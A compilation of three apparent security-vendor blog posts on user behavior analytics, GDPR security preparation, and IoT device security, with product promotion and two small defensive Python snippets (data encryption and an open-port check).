According to the 2016 Verizon DBIR, 63% of data breaches involved weak, default, or compromised credentials. Companies have solid coverage for known malware and their network perimeter, but teams now need visibility into normal and anomalous user behavior. Largely, the response has been to deploy SIEM technology to monitor for these threats. While the tech is helping with log aggregation and correlation, teams aren’t consistently detecting the stealthy behavior real-world attackers are using to breach networks.

 

What Are the Analysts Saying About UBA?

Gartner: In their most recent Market Guide for User and Entity Behavior Analytics, they agree that UEBA vendors can help threat detection across a variety of use cases. However, they don’t make it easy by listing 29 vendors in the report, so be careful with selection – perhaps the most striking prediction is that “by 2020, less than five stand-alone UEBA solutions will remain in the market, with other vendors focusing on specific use cases and outcomes.”

 

Forrester: In the July 2016 Forrester report, Vendor Landscape: Security User Behavior Analytics (SUBA), a key takeaway is to “require a SUBA demonstration with your own data.” Something everyone is agreeing on is the need for user behavior analytics to be a part of a larger analytics suite, aptly named Security Analytics, which extends beyond SIEM to include network analysis and visibility, endpoint visibility, behavioral analysis, and forensic investigative tools. For more on this shift, we hosted guest speaker, Forrester senior analyst Joseph Blankenship, on the webcast, “The Struggle of SIEM”.

 

451 Research: In addition to rallying behind the need to go beyond SIEM with Security Analytics, there’s agreement that even in 2017, there will be a shakeout in the UBA space. That doesn’t just mean life or death for startup vendors, but also the challenge for large SIEM vendors to incorporate UBA into existing legacy platforms.

 

IDG: The suggested approach is under a security operations and analytics platform architecture (SOAPA). While SIEM technology still plays at the core, SOAPA also includes endpoint detection and response, an incident response platform, network security analytics, UBA, vulnerability management, anti-malware sandboxes, and threat intelligence. While that’s certainly a mouthful, the important takeaway is that UBA is only one of the technologies that should work together to detect threats across the entire attack chain.

 

Questions to Consider

  • If you’re looking at User Behavior Analytics, you’ve likely already experienced pain with an existing SIEM. Will you have enough resources to maintain both the SIEM deployment and a separate UBA tool?
  • Can you put the technology to the test? If you don’t have an internal red team, a great time to POC a UBA vendor is when considering a penetration test.
  • For more, check out our evaluation brief: A Matchmakers Guide to UBA Solutions.

 

And, for added context on the go, we just released a new episode all about UBA on the Security Nation podcast:


 

The Rapid7 Take

Since the first GA date of our UBA technology in early 2014, we’re proud to be both a first mover and have hundreds of customers using UBA to monitor their environments. However, we found that UBA technology alone still leaves gaps in detection coverage, forcing teams to jump between portals during every incident investigation. For that reason, InsightIDR, our solution for incident detection and response, combines SIEM, UBA, and Endpoint Detection capabilities, without the traditional burdens involved in deploying each of these technologies independently.

 


 

In addition to the UBA detecting stealthy behavior, InsightIDR also analyzes real-time endpoint data and uses Deception Technology to reveal behavior unseen by log analysis. Through a robust data search and visualization platform, security teams can bring together log search, user activity, and endpoint data for investigations without jumping between multiple tools. Of course, this is a bold claim - if you’d like to learn more, check out the below 3-minute Solution Overview or check out our webcast, User Behavior Analytics, as easy as ABC.

 

Sam Humphries

Preparing for GDPR

Posted by Sam Humphries Employee Feb 23, 2017

GDPR is coming…

If your organisation does business with Europe, or more specifically does anything with the Personal Data of EU Citizens who aren’t dead (i.e. Natural Persons), then, just like us, you’re going to be in the process of living the dream that is Preparing for the General Data Protection Regulation. For many organisations this is going to be a gigantic exercise: even if you have implemented processes and technologies to meet current regulations, there is still additional work to be done.

 

Penalties for infringements of GDPR can be incredibly hefty; they are designed to be dissuasive. Depending on the type of infringement, the fine can be up to €20 million or 4% of your worldwide annual turnover, whichever is the higher amount. Compliance is not optional, unless you fancy being fined eye-watering amounts of money, or you really don’t have any personal data of EU citizens within your control.

 

The Regulation applies from May 25th 2018. That’s the day from which organisations will be held accountable, and depending on which news website you choose to read, many organisations are far from ready at the time of writing this blog. Preparing for GDPR is likely to be a cross-functional exercise, as Legal, Risk & Compliance, IT, and Security all have a part to play. It’s not a small amount of regulation (are they ever?) to read and understand either – there are 99 Articles and 173 Recitals.

 

I expect if you’re reading this, it’s because you’re hunting for solutions, services, and guidance to help you prepare. Whilst no single software or services vendor can act as a magic bullet for GDPR, Rapid7 can certainly help you cover some of the major security aspects of protecting Personal Data. We have solutions to help you detect attackers earlier in the attack chain, and service offerings that can help you proactively test your security measures; we can also jump into the fray if you do find yourselves under attack.

 

Processes and procedures, training, in addition to technology and services all have a part to play in GDPR. Having a good channel partner to work with during this time is vital as many will be able to provide you with the majority of aspects needed. For some organisations, changes to roles and responsibilities are required too – such as appointing a Data Protection Officer, and nominating representatives within the EU to be points of contact.

So what do I need to do?

If you’re just beginning in your GDPR compliance quest, I’d recommend you take a look at this guide which will get you started in your considerations. Additionally, having folks attend training so that they can understand and learn how to implement GDPR is highly recommended – spending a few pounds/euros/dollars, etc on training now can save you from the costly infringement fines later on down the line. There are many courses available – in the UK I recently took this foundation course, but do hunt around to find the best classroom or virtual courses that make sense for your location and teams.

 

Understanding where Personal Data physically resides, the categories of Personal Data you control and/or process, how and by whom it is accessed, and how it is secured are all areas that you have to deal with when complying with GDPR. Completing Privacy Impact Assessments is a good step here. Processes for access control, incident detection and response, breach notification, and more will also need review or implementation. Being hit with a €20 million+ fine is not something any organisation will want to be subject to; depending on the size of your organisation, a fine of this magnitude could easily be a terminal moment.

 

There is some good news: demonstrating compliance, mitigating risk, and ensuring a high level of security are all factors that are considered if you are unfortunate enough to experience a data breach. But ideally, not being breached in the first place is best, as I’m sure you‘d agree, so this is where your security posture comes in.

 

Article 5, which lists the six principles of processing personal data, states that personal data must be processed in an appropriate manner so as to maintain security. This principle is covered in more detail by Article 32, which you can read more about here.

 

Ten Recommendations for Securing Your Environment

  1. Encrypt data – both at rest and in transit. If you are breached, but the Personal Data is in a form that renders it unintelligible to the attacker, then you do not have to notify the Data Subjects (see Article 34 for more on this). There are lots of solutions on the market today – have a chat with your channel partner to see what options are best for you. (A minimal encryption-at-rest sketch follows this list.)
  2. Have a solid vulnerability management process in place, across the entire ecosystem. If you’re looking for best practices recommendations, do take a look at this post. Ensuring ongoing confidentiality, integrity and availability of systems is part of Article 32 – if you read Microsoft’s definition of a software vulnerability it talks to these three aspects.
  3. Backups. Backups. Backups. Please make backups. Not just in case of a dreaded ransomware attack; they are a good housekeeping facet anyway in case of things like storage failure, asset loss, natural disaster, even a full cup of coffee over the laptop. If you don’t currently have a backup vendor in place, Code42 have some great offerings for endpoints, and there are a plethora of server and database options available on the market today. Disaster recovery should always be high on your list regardless of which regulations you are required to meet.
  4. Secure your web applications. Privacy-by-design needs to be built in to processes and systems – if you’re collecting Personal Data via a web app and still using http/clear text then you’re already going to have a problem.
  5. Pen tests are your friend. Attacking your systems and environment to understand your weak spots will tell you where you need to focus, and it’s better to go through this exercise as a real-world scenario now than wait for a ‘real’ attacker to get in to your systems. You could do this internally using tools like Metasploit Pro, and you could employ a professional team to perform regular external tests too. Article 32 says that you need to have a process for regularly testing, assessing, & evaluating the effectiveness of security measures. Read more about Penetration testing in this toolkit.
  6. Detect attackers quickly and early. Finding out that you’ve been breached ~5 months after it first happened is an all too common scenario (current stats from Mandiant say that the average is 146 days after the event). Almost 2/3s of organisations told us that they have no way of detecting compromised credentials, which has topped the list of leading attack vectors in the Verizon DBIR for the last few years. User Behaviour Analytics provide you with the capabilities to detect anomalous user account activity within your environment, so you can investigate and remediate fast.
  7. Lay traps. Deploying deception technologies, like honey pots and honey credentials, are a proven way to spot attackers as they start to poke around in your environment and look for methods to access valuable Personal Data. 
  8. Don’t forget about cloud-based applications. You might have some approved cloud services deployed already, and unless you’ve switched off the internet it’s highly likely that there is a degree of shadow IT (a.k.a. unsanctioned services) happening too. Making sure you have visibility across sanctioned and unsanctioned services is a vital step to securing them, and the data contained within them.
  9. Know how to prioritise and respond to the myriad of alerts your security products generate on a daily basis. If you have a SIEM in place that’s great, providing you’re not getting swamped by alerts from the SIEM, and that you have the capability to respond 24x7 (attackers work evenings and weekends too). If you don’t have a current SIEM (or the time or budget to take on a traditional SIEM deployment project), or you are finding it hard to keep up with the number of alerts you’re currently getting, take a look at InsightIDR – it covers a multitude of bases (SIEM, UBA and EDR), is up and running quickly, and generates alert volumes that are reasonable for even the smallest teams to handle. Alternatively, if you want 24x7 coverage, we also have a Managed Detection and Response offering which takes the burden away, and is your eyes and ears regardless of the time of day or night.
  10. Engage with an incident response team immediately if you think you are in the midst of an attack. Accelerating containment and limiting damage requires fast action. Rapid7 can have an incident response engagement manager on the phone with you within an hour.
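To make the first recommendation concrete, here is a minimal encryption-at-rest sketch using the widely available Python cryptography library (Fernet symmetric encryption). It illustrates the mechanics only; in a real deployment the key would be generated and held in a KMS or HSM, never stored alongside the data it protects.

```python
from cryptography.fernet import Fernet  # pip install cryptography

# In practice the key comes from a KMS/HSM; generating it inline is for illustration.
key = Fernet.generate_key()
fernet = Fernet(key)

record = b'{"name": "Jane Doe", "email": "jane@example.eu"}'   # placeholder personal data
token = fernet.encrypt(record)          # store this ciphertext at rest
print("stored:", token[:40], b"...")

# Later, an authorized process with access to the key can recover the record.
print("recovered:", fernet.decrypt(token))
```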

 

Security is just one aspect of the GDPR, for sure, but it’s very much key to compliance. Rapid7 can help you ready your organisation; please don’t hesitate to contact us or one of our partners if you are interested in learning more about our solutions and services.

 

GDPR doesn’t have to be GDP-argh!

Deral Heiland

IoT: Friend or Foe?

Posted by Deral Heiland Employee Feb 21, 2017

Since IoT can serve as an enabler, I prefer to consider it a friend. However, the rise of recent widespread attacks leveraging botnets of IoT devices has called the trust placed in these devices into question. The massive DDoS attacks have quieted down for now, but I do not expect the silence to last long. Since many of the devices used in recent attacks may still be online and many new IoT vulnerabilities continue to be identified, I expect what comes next will look similar to, or the same as, past attacks.

 

While we're enjoying a lull before that happens, I figured it’s time for another good heart-to-heart discussion about the state of IoT security, including what it means to use IoT wisely and how to keep ourselves and each other safe from harm.

 

First I would like to level set: security vulnerabilities are not unique to IoT. We have been dealing with them for decades, and I expect we will have them with us for decades to come. We need to focus on building a healthy understanding of, and respect for, the use and security of IoT technologies. This will help us make better-informed decisions about the associated risk and deployment.

 

So why do IoT security vulnerabilities appear to have become such a threat lately? I think the answer to that question has four parts.

  1. The mass quantity of currently deployed devices. Unfortunately we cannot fix this issue, as these devices are already in place and deployment growth is expected to skyrocket by the end of the decade. Further, I don’t think we should want to fix this issue; there's nothing worse than avoiding new technology solely out of fear.
  2. Common vulnerabilities. IoT technology has taken a beating (rightly so) over the last year or two because of all of the simple vulnerabilities that are being discovered. Simple issues such as weak encryption, unauthenticated access to services, and default passwords hardcoded in the firmware are commonplace and just a small sample of core, basic issues within these devices.
  3. Ease of use. We are living in a plug-and-play generation. As a manufacturer, if your product doesn’t just work out of the box, it is unlikely anyone will buy it. So, sadly, we continue to trade security for usability.
  4. Exposure through unfettered access. Your plug-and-play IoT technology is exposed to any anonymous entity on the Internet. This is analogous to giving your car keys and a bottle of whiskey to not just your sixteen-year-old, but all possible sixteen-year-olds around the world. Nothing good will come of it.

 

Since we are not going to abandon IoT, the first item is effectively unfixable. With that said, expect billions more IoT devices to enter our environment over the coming years. This makes the remaining three items all the more critical. So let us discuss those items next and look at possible solutions and next steps moving forward.

 

Common vulnerabilities:

We are never going to solve this issue overnight, but it's not like we can just throw up our hands and give up.  In our current IoT world we have dozens of new startups producing new products constantly, as well as dozens of established companies — that have never produced IoT products before — releasing new and “enhanced” products every month. To address these issues it would be great to see these companies implement a security program to facilitate security best practices in the design of their products. For these companies, contacting and partnering with non-profit organizations focused on the public good (like our friends at builditsecure.ly, or I Am The Cavalry) can help them during the design phase. Last but not least, every manufacturer of IoT needs to develop a sound process for handling discovered security issues within their products, including an effective security patching process.

 

Ease of Use:

Everyone likes a product that is easy to deploy and operate, but we need to consider security as part of that deployment. Default password issues have been haunting us for years, and it's time we exorcise that demon. We need to make setting a password part of the deployment process for all IoT technology, including consumer-grade solutions. Passwords are not the only issue: another common problem is products shipping with every function and service enabled, whether they are being used or not. Only the services needed for basic operation should be enabled by default; all other features should be enabled as needed. Of course, this will require vendors to put more attention into documentation and into making their product management consoles more intuitive. In the end, with a little work, we can expect "ease-of-use" to also become "ease-of-security" in our IoT products.

 

Exposure:

Exposure issues are often just unplanned deployments made without considering the impact or risk. Exposing IoT management services such as Telnet, SSH, and even web consoles directly to the Internet should be avoided, unless you truly need the whole Internet knocking at your IoT door. If remote management is vital to the operation of a product, best practice is to place those services behind a VPN, require two-factor authentication, or both (depending on the nature of the IoT solution being deployed). Another option is to leverage basic firewall configurations to restrict administrative access to a specific IP address on the host device. Also, do not forget that it is very common for IoT management and control services to run on non-standard port numbers; I have seen telnet on a number of different ports besides TCP port 23. So it is important to understand the product you’re deploying in detail; this will help you avoid accidental exposures. As added food for thought on deploying IoT technology, consider taking a look at a blog we created several months ago on IoT best practices: getting-a-handle-on-the-internet-of-things-in-the-enterprise.
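One simple way to catch the accidental exposures described above before a device goes into production is to probe it for listening management services, including telnet on non-standard ports. The sketch below is a basic TCP connect check; the port list and device address are assumptions and should be tuned to the product under review.

```python
import socket

# Hypothetical list: standard management ports plus a few commonly re-mapped ones.
PORTS = [22, 23, 80, 443, 2323, 8023, 8080, 8443]

def open_ports(host, ports, timeout=2.0):
    """Return the subset of ports that accept a TCP connection."""
    found = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:
                found.append(port)
    return found

if __name__ == "__main__":
    device = "192.0.2.10"   # replace with the device under review
    exposed = open_ports(device, PORTS)
    print(f"{device} answers on: {exposed or 'no probed ports'}")
```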

 

So in conclusion, in the debate around the trustworthiness of IoT, we need to turn our attention away from fear, uncertainty, and doubt, and focus on working together to resolve the three issues I have pointed out here. With some diligence and cooperation, I am sure we can better manage the risk associated with the use and deployment of IoT technology. With the growth of IoT expected to skyrocket over the next several years, we pretty much have no choice.
